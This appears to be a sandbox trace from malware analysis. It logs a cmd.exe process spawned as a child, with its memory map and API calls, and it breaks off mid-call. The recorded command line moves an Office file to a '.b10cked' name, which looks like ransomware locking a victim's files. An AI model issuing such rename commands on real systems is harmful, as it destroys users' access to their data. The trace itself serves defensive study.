[0202.574] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.574] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.574] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.574] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.574] SetConsoleInputExeNameW () returned 0x1 [0202.574] GetConsoleOutputCP () returned 0x1b5 [0202.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.575] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.575] exit (_Code=1) Process: id = "474" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0xe48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29326 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29327 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29328 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29329 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 29330 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29331 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29332 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29333 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29334 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29335 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29536 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29537 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29538 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29539 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 29540 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 29541 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29542 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29543 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29544 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29545 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29546 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29547 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29548 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29549 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29606 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 29607 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29608 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29609 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29610 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 29611 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 29612 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 29613 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 29614 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 29615 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 29680 start_va = 0x2e0000 end_va = 0x39ffff entry_point = 0x2e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 671 os_tid = 0xfe4 [0201.655] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd9c | out: lpSystemTimeAsFileTime=0x1cfd9c*(dwLowDateTime=0xad02af40, dwHighDateTime=0x1d440a9)) [0201.655] GetCurrentProcessId () returned 0xe48 [0201.655] GetCurrentThreadId () returned 0xfe4 [0201.655] GetTickCount () returned 0x38f15 [0201.655] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd94 | out: lpPerformanceCount=0x1cfd94*=25844415267) returned 1 [0201.659] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.659] __set_app_type (_Type=0x1) [0201.659] __p__fmode () returned 0x76b331f4 [0201.659] __p__commode () returned 0x76b331fc [0201.659] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.659] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.659] GetCurrentThreadId () returned 0xfe4 [0201.660] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfe4) returned 0x38 [0201.660] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.660] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.660] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.703] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.703] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfd2c | out: phkResult=0x1cfd2c*=0x0) returned 0x2 [0201.703] VirtualQuery (in: lpAddress=0x1cfd63, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.703] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.703] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.703] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.703] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfcfc, dwLength=0x1c | out: lpBuffer=0x1cfcfc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.703] GetConsoleOutputCP () returned 0x1b5 [0201.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.716] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.716] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.716] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.718] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.725] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.727] GetEnvironmentStringsW () returned 0x3c0188* [0201.727] FreeEnvironmentStringsW (penv=0x3c0188) returned 1 [0201.727] GetEnvironmentStringsW () returned 0x3c0188* [0201.727] FreeEnvironmentStringsW (penv=0x3c0188) returned 1 [0201.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec9c | out: phkResult=0x1cec9c*=0x40) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0xb0, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x1, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x1, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x0, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x40, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x40, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.727] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x40, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.727] RegCloseKey (hKey=0x40) returned 0x0 [0201.727] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec9c | out: phkResult=0x1cec9c*=0x40) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x40, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x1, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x1, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x0, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x9, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x4, lpData=0x1ceca8*=0x9, lpcbData=0x1ceca0*=0x4) returned 0x0 [0201.728] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ceca4, lpData=0x1ceca8, lpcbData=0x1ceca0*=0x1000 | out: lpType=0x1ceca4*=0x0, lpData=0x1ceca8*=0x9, lpcbData=0x1ceca0*=0x1000) returned 0x2 [0201.728] RegCloseKey (hKey=0x40) returned 0x0 [0201.728] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.728] srand (_Seed=0x5b8863a3) [0201.728] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"" [0201.728] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"" [0201.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.729] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.729] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.729] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.729] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.729] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.729] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.729] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.729] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.729] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.729] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.729] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.729] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.729] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.729] GetEnvironmentStringsW () returned 0x3c22d8* [0201.729] FreeEnvironmentStringsW (penv=0x3c22d8) returned 1 [0201.729] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.729] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.730] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.730] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.730] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.730] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.730] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.730] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.730] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.730] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.730] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfa68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.730] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfa68, lpFilePart=0x1cfa64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cfa64*="Desktop") returned 0x18 [0201.730] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.730] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf7e4 | out: lpFindFileData=0x1cf7e4) returned 0x3c0018 [0201.730] FindClose (in: hFindFile=0x3c0018 | out: hFindFile=0x3c0018) returned 1 [0201.730] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf7e4 | out: lpFindFileData=0x1cf7e4) returned 0x3c0018 [0201.730] FindClose (in: hFindFile=0x3c0018 | out: hFindFile=0x3c0018) returned 1 [0201.731] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf7e4 | out: lpFindFileData=0x1cf7e4) returned 0x3c0018 [0201.731] FindClose (in: hFindFile=0x3c0018 | out: hFindFile=0x3c0018) returned 1 [0201.731] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.731] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.731] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.731] GetEnvironmentStringsW () returned 0x3c2af8* [0201.731] FreeEnvironmentStringsW (penv=0x3c2af8) returned 1 [0201.731] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.732] GetConsoleOutputCP () returned 0x1b5 [0201.752] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.752] GetUserDefaultLCID () returned 0x409 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfba8, cchData=128 | out: lpLCData="0") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfba8, cchData=128 | out: lpLCData="0") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfba8, cchData=128 | out: lpLCData="1") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.757] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.758] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.758] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.758] GetConsoleTitleW (in: lpConsoleTitle=0x3b08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.765] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.765] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.765] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.765] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.766] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.766] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.766] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.766] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.766] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.766] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.766] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.769] GetConsoleTitleW (in: lpConsoleTitle=0x1cf8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.785] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.785] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.785] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.785] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.785] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.785] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.785] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.786] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.786] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.786] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.786] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.786] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.786] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.786] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.786] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.786] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.786] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.786] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.786] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.786] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.786] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.786] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.786] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.786] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.786] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.786] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.786] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.786] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.786] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.786] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.786] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.786] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.786] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.786] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.786] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.788] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.788] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf65c, nVolumeNameSize=0x104, 